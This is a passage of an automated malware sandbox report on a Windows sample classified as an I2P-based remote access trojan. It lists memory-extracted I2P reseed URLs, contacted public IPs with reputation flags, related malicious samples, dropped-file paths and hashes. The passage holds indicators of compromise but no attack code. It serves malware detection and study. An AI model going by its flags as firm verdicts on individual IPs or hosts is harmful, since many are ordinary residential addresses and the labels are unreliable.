http://identiguy.i2p/hosts.txt	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	false	Avira URL Cloud: safe	unknown
https://reseed.diva.exchange/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: malware	unknown
https://legit-website.com/i2pseeds.su3	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	false	Avira URL Cloud: safe	unknown
https://reseed.onion.im/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
https://i2p.mooo.com/netDb/	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	false	Avira URL Cloud: safe	unknown
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	false	Avira URL Cloud: safe	unknown
https://reseed.stormycloud.org/k	main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reseed.stormycloud.org/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
https://reseed2.i2p.net/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: malware	unknown
https://www2.mk16.de/(	main.exe, 00000014.00000002.2557742278.0000013B45238000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://	main.exe, 00000014.00000002.2557742278.0000013B4520D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://banana.incognet.io/	main.exe, main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, NCdDxWNe.20.dr	true	Avira URL Cloud: safe	unknown
https://reseed.onion.im/B	main.exe, 0000001F.00000003.2676980789.00000201EB502000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2935145951.00000201EB4CE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://reg.i2p/hosts.txtL	main.exe, 00000014.00000002.2557908253.0000013B4567C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://rus.i2p/hosts.txt	jvnu3e85o6ls9huft0apy3731vg.exe, 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmp, main.exe, 00000014.00000002.2557134947.0000013B44DDB000.00000004.00000020.00020000.00000000.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:8118J?	main.exe, 0000001F.00000003.2661057466.00000201EB4A8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000003.2660987884.00000201EB4A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://i2p.ghativega.in/p/p_lib.c	main.exe, 00000014.00000003.1910940308.0000013B452A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt	main.exe, main.exe, 0000001F.00000002.2935145951.00000201EB46D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001F.00000002.2936608110.00007FFDFB3F4000.00000002.00000001.01000000.0000000A.sdmp, r9vFmZ4q.20.dr, i2p.conf.20.dr, NCdDxWNe.20.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
76.26.184.38	unknown	United States	7922	COMCAST-7922US	false
73.155.122.99	unknown	United States	7922	COMCAST-7922US	false
184.65.173.183	unknown	Canada	6327	SHAWCA	false
99.252.122.69	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	false
46.209.176.184	unknown	Iran (ISLAMIC Republic Of)	49100	IR-THR-PTEIR	false
174.119.206.85	unknown	Canada	812	ROGERS-COMMUNICATIONSCA	true
23.137.250.43	unknown	Reserved	397614	GTLAKESUS	false
139.59.231.96	unknown	Singapore	14061	DIGITALOCEAN-ASNUS	false
95.31.23.9	unknown	Russian Federation	3216	SOVAM-ASRU	true
98.16.145.157	unknown	United States	7029	WINDSTREAMUS	false
217.156.67.239	unknown	Romania	50884	XCHANGENETRO	false
88.228.207.122	unknown	Turkey	9121	TTNETTR	false
72.199.129.69	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	false
138.74.168.219	unknown	United States	2041	STNORBERTCOLLEGEUS	false
217.24.233.6	unknown	Germany	9063	SAARGATE-ASVSENETGmbHDE	false
218.156.39.195	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	false
185.121.12.251	unknown	Spain	207046	REDSERVICIOES	false
5.161.229.21	unknown	Germany	24940	HETZNER-ASDE	false
87.219.13.126	unknown	Spain	12479	UNI2-ASES	false
175.215.255.118	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
89.223.52.84	unknown	Russian Federation	42668	NEVALINK-ASRU	true
135.181.93.228	unknown	Germany	24940	HETZNER-ASDE	false
185.177.216.199	unknown	Russian Federation	206738	TRCLINKIT	false
193.148.16.211	unknown	Romania	9009	M247GB	false
85.23.104.222	unknown	Finland	16086	DNAFI	false
45.200.148.158	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
78.22.234.134	unknown	Belgium	6848	TELENET-ASBE	false
80.74.145.70	reseed.diva.exchange	Switzerland	21069	ASN-METANETRoutingpeeringissuesnocmetanetchCH	true
120.26.116.232	unknown	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
86.45.126.166	unknown	Ireland	5466	EIRCOMInternetHouseIE	false
173.209.166.184	unknown	United States	13370	LOCALTELUS	true
95.158.36.98	unknown	Ukraine	35362	BESTBestISPUA	true
134.16.78.198	unknown	United States	385	AFCONC-BLOCK1-ASUS	true
184.144.18.148	unknown	Canada	577	BACOMCA	false
207.246.88.73	unknown	United States	20473	AS-CHOOPAUS	false
73.31.50.204	unknown	United States	7922	COMCAST-7922US	false
95.105.66.5	unknown	Russian Federation	57128	KGS-NETRU	false
73.114.39.41	unknown	United States	7922	COMCAST-7922US	false
94.177.106.53	unknown	Romania	58022	AGE-ASstrPrincipalanr138RO	false
96.245.131.50	unknown	United States	701	UUNETUS	false
46.139.242.51	unknown	Hungary	5483	MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHU	true
83.6.222.32	unknown	Poland	5617	TPNETPL	false
91.82.213.104	unknown	Hungary	20845	DIGICABLEHU	false
172.98.216.26	unknown	United States	396097	SAIL-INETUS	false
77.238.224.240	unknown	Russian Federation	42429	TELERU-ASRU	false
24.60.181.65	unknown	United States	7922	COMCAST-7922US	false
87.106.66.194	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
112.16.103.31	unknown	China	56041	CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC	false
150.230.127.230	unknown	United States	13376	TOPPAN-MERRILLUS	false
193.233.193.76	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
78.162.217.132	unknown	Turkey	9121	TTNETTR	false
73.27.22.30	unknown	United States	7922	COMCAST-7922US	false
136.60.17.104	unknown	United States	16591	GOOGLE-FIBERUS	false
159.223.194.171	reseed.onion.im	United States	46118	CELANESE-US	true
24.128.131.37	unknown	United States	7922	COMCAST-7922US	false
188.211.91.73	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false
68.183.196.133	reseed.i2pgit.org	United States	14061	DIGITALOCEAN-ASNUS	true
72.83.161.95	unknown	United States	701	UUNETUS	false
94.131.171.105	unknown	Ukraine	53856	NJIXUS	false
46.138.247.227	unknown	Russian Federation	25513	ASN-MGTS-USPDRU	true
185.226.181.238	reseed-pl.i2pd.xyz	Spain	197518	RACKMARKTES	true
88.209.121.106	unknown	Monaco	6758	AS6758MC	false
79.119.11.221	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589221
Start date and time:	2025-01-11 20:25:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	80P.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@43/69@4/64
EGA Information:	Successful, ratio: 60%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29, 172.202.163.200, 13.107.246.45, 40.126.32.138
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 80P.exe, PID 6856 because there are no executed function
Execution Graph export aborted for target jvnu3e85o6ls9huft0apy3731vg.exe, PID 5840 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:26:04	API Interceptor	196x Sleep call for process: 80P.exe modified
14:26:06	API Interceptor	40x Sleep call for process: powershell.exe modified
14:26:57	API Interceptor	671x Sleep call for process: main.exe modified
14:27:28	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
23.137.250.43	DF2.exe	Get hash	malicious	Unknown	Browse
23.137.250.43	ET5.exe	Get hash	malicious	Unknown	Browse
138.74.168.219	file.exe	Get hash	malicious	Unknown	Browse
184.65.173.183	file.exe	Get hash	malicious	Unknown	Browse
184.65.173.183	file.exe	Get hash	malicious	Unknown	Browse
139.59.231.96	cZO.exe	Get hash	malicious	Unknown	Browse
88.228.207.122	DF2.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reseed.i2pgit.org	cZO.exe	Get hash	malicious	Unknown	Browse	68.183.196.133
reseed.i2pgit.org	DF2.exe	Get hash	malicious	Unknown	Browse	68.183.196.133
reseed.diva.exchange	DF2.exe	Get hash	malicious	Unknown	Browse	80.74.145.70
reseed.diva.exchange	file.exe	Get hash	malicious	Unknown	Browse	80.74.145.70
reseed.onion.im	cZO.exe	Get hash	malicious	Unknown	Browse	159.223.194.171
reseed-pl.i2pd.xyz	cZO.exe	Get hash	malicious	Unknown	Browse	185.226.181.238

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROGERS-COMMUNICATIONSCA	6.elf	Get hash	malicious	Unknown	Browse	99.242.157.220
	4.elf	Get hash	malicious	Unknown	Browse	72.136.85.108
	5.elf	Get hash	malicious	Unknown	Browse	174.116.51.150
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	69.17.129.62
	sora.spc.elf	Get hash	malicious	Mirai	Browse	173.42.2.191
	miori.m68k.elf	Get hash	malicious	Unknown	Browse	174.113.180.168
	miori.x86.elf	Get hash	malicious	Unknown	Browse	173.33.68.46
	arm5.elf	Get hash	malicious	Mirai	Browse	99.228.179.155
	spc.elf	Get hash	malicious	Mirai	Browse	99.242.209.196
	i486.elf	Get hash	malicious	Mirai	Browse	99.250.235.74
SHAWCA	5.elf	Get hash	malicious	Unknown	Browse	24.69.73.54
	6.elf	Get hash	malicious	Unknown	Browse	24.70.86.29
	3.elf	Get hash	malicious	Unknown	Browse	174.7.136.232
	Fantazy.mpsl.elf	Get hash	malicious	Unknown	Browse	70.67.61.215
	sora.ppc.elf	Get hash	malicious	Unknown	Browse	24.109.19.148
	3.elf	Get hash	malicious	Unknown	Browse	24.109.19.163
	miori.m68k.elf	Get hash	malicious	Unknown	Browse	70.66.3.21
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	24.109.54.109
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	174.3.244.122
	momo.mpsl.elf	Get hash	malicious	Mirai	Browse	24.84.202.204
COMCAST-7922US	res.x86.elf	Get hash	malicious	Unknown	Browse	25.43.128.161
	6.elf	Get hash	malicious	Unknown	Browse	50.255.150.66
	3.elf	Get hash	malicious	Unknown	Browse	173.162.185.65
	5.elf	Get hash	malicious	Unknown	Browse	66.176.224.255
	6.elf	Get hash	malicious	Unknown	Browse	73.119.109.120
	5.elf	Get hash	malicious	Unknown	Browse	74.159.94.125
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	184.108.200.169
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	75.69.59.105
	frosty.x86.elf	Get hash	malicious	Mirai	Browse	174.50.238.136
	frosty.ppc.elf	Get hash	malicious	Mirai	Browse	68.62.136.139
COMCAST-7922US	res.x86.elf	Get hash	malicious	Unknown	Browse	25.43.128.161
	6.elf	Get hash	malicious	Unknown	Browse	50.255.150.66
	3.elf	Get hash	malicious	Unknown	Browse	173.162.185.65
	5.elf	Get hash	malicious	Unknown	Browse	66.176.224.255
	6.elf	Get hash	malicious	Unknown	Browse	73.119.109.120
	5.elf	Get hash	malicious	Unknown	Browse	74.159.94.125
	frosty.arm.elf	Get hash	malicious	Mirai	Browse	184.108.200.169
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	75.69.59.105
	frosty.x86.elf	Get hash	malicious	Mirai	Browse	174.50.238.136
	frosty.ppc.elf	Get hash	malicious	Mirai	Browse	68.62.136.139

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	cZO.exe	Get hash	malicious	Unknown	Browse
	DF2.exe	Get hash	malicious	Unknown	Browse
	ET5.exe	Get hash	malicious	Unknown	Browse
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	cZO.exe	Get hash	malicious	Unknown	Browse
	DF2.exe	Get hash	malicious	Unknown	Browse
	ET5.exe	Get hash	malicious	Unknown	Browse
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	cZO.exe	Get hash	malicious	Unknown	Browse
	DF2.exe	Get hash	malicious	Unknown	Browse
	ET5.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9803229368968392
Encrypted:	false
SSDEEP:	192:NN/om6Z/d0MALS36jN7EzuiFXZ24lO8l:nwmc/eMALXjNgzuiFXY4lO8l
MD5:	3E649E410C8339CF9A5675B9CDD7AD5A
SHA1:	BD86DB608AE3A774CD49160F2C9268AB78A597A2
SHA-256:	F3FB90364B68A67031FD5CFE1D16DBECF32F52FEAE7090F3FDA6B7529E948374
SHA-512:	A96BFACF53297579A1C01DA487BDD2277FD4CE2D6422D5E199FE7259EDC299A3021610661F0DDBC82F132F204D15314AF64324695434F74B8F4B863AA103EEF3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_1d12cab9-8df1-4b73-ab59-8d57e46c430f\Report.wer, Author: Joe Security
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.9.7.2.3.5.9.5.8.0.7.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.9.7.2.3.6.4.4.2.4.4.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.d.1.2.c.a.b.9.-.8.d.f.1.-.4.b.7.3.-.a.b.5.9.-.8.d.5.7.e.4.6.c.4.3.0.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.b.4.2.9.4.2.-.c.4.d.e.-.4.8.1.8.-.a.7.3.4.-.3.d.5.3.3.d.6.a.e.9.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.1.c.-.0.0.0.0.-.0.0.1.4.-.8.4.3.1.-.0.9.b.2.5.e.6.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.b.d.b.8.9.6.1.f.8.a.f.b.9.9.9.a.e.c.e.6.0.b.f.1.e.f.3.e.4.9.e.8.e.2.3.4.9.f.7.b.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jan 11 19:27:16 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	634514
Entropy (8bit):	1.008535629636829
Encrypted:	false
SSDEEP:	768:CwrjwUH+eSbUsd9Mg7cLs2VL8xooeKH2RvHkCjPg9xGFNOh:CwDiFXN2VLmjtH2R/r
MD5:	011524809F9BD76FAFBE6CF2C63B6DF2
SHA1:	D3C0C1F89E480A2BFBD839927E2EDE60C87B12C3
SHA-256:	3CA97B60FE5454A7B9EA0C13606E68E0908DE90152C792118C82A0D30E7929C2
SHA-512:	034C35BA6973A8A73FC1D4EF32A34D1DDE833A4F49BEFE5B333C22A554FE8FDDFF80D232D17D0F130347FE56F8B730D57C3B4A61BCFF154F94487DD5D8980B21
Malicious:	true
Yara Hits:	Rule: JoeSecurity_I2PRAT, Description: Yara detected I2PRAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E32.tmp.dmp, Author: Joe Security
Preview:	MDMP..a..... .........g............$...........(...8...........` ..........h...........`.......8...........T............0...~..........\!..........H#..............................................................................eJ.......#......Lw......................T.............g.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F3C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6732
Entropy (8bit):	3.721388700352761
Encrypted:	false
SSDEEP:	192:R6l7wVeJ5a8mYHRprB89bfMdY7f6/Ylqm:R6lXJkNYHifMy7f6Wb
MD5:	2D35153B8F0873F66D653489CE9550C4
SHA1:	1BEAB38843AB39B8208AC78FDD488A224733329F
SHA-256:	4B932E3EF6D2A06BEE593309C8FEE30DAC4D5526BFECF584DA46C4D4523EC6B3
SHA-512:	59455F6EBCA6F42D5DEBAE484AA1F6052F92F3BB968872284761DDC5BA6FB8D44BAC3E1AF2FAE2E053DACCB49F4C69C265CF4ABF66E4293CEEC6843D20220912
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.2.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F5D.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4603
Entropy (8bit):	4.413689129586213
Encrypted:	false
SSDEEP:	48:cvIwWl8zsnJg771I9QDWpW8VYHNYm8M4JD2+AFwyq85/3Ek4hA3+Mwd:uIjfJI7jy7VZJXuIA3Zwd
MD5:	925925FA81768320B8D7B520DCE20111
SHA1:	2B17E61C17E6A2D98BA0A81AC8BC437F6695688D
SHA-256:	916F2F6DA71722BBE7A8875ADD22EBA830E4E7D418B6A154C25B0E912410CD6B
SHA-512:	29552C689074EB2A6348E779DFD2BA7941D81854CFDF9D0E3CF4D137E708AEBBD4EA8754377248810294E6C9E297E8E4439A692AFE43C6D458AB320E76A0CCDD
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="671669" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F6A.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77762
Entropy (8bit):	3.090773465565251
Encrypted:	false
SSDEEP:	768:ev/Z5HZFrRZwLI4d+y9f0IvIgk8pE1SPzNQ3Svt4QO52PVAw0:ev/5RRZwLldd+SIgxE1SbNQ3Svt4T2P6
MD5:	F4331F6F299603032F67B1E32D57E8EA
SHA1:	6AB7EBF1480C6CCD5D84F228EED05F03523F2E7B
SHA-256:	5DEBF09CD87897FC0962F17981CAFA7BB3DAB7C122957C0C29138987E3C26100
SHA-512:	B5DA03C025455BA9A4B0F5FE45D5E28B979734FECA137E49DCE8B5EF8DC833CD6482DDFDE3B35DB6E3A6FB4DCB95232D1B026EEA22B561A7D7885989CF1F4AD8
Malicious:	false
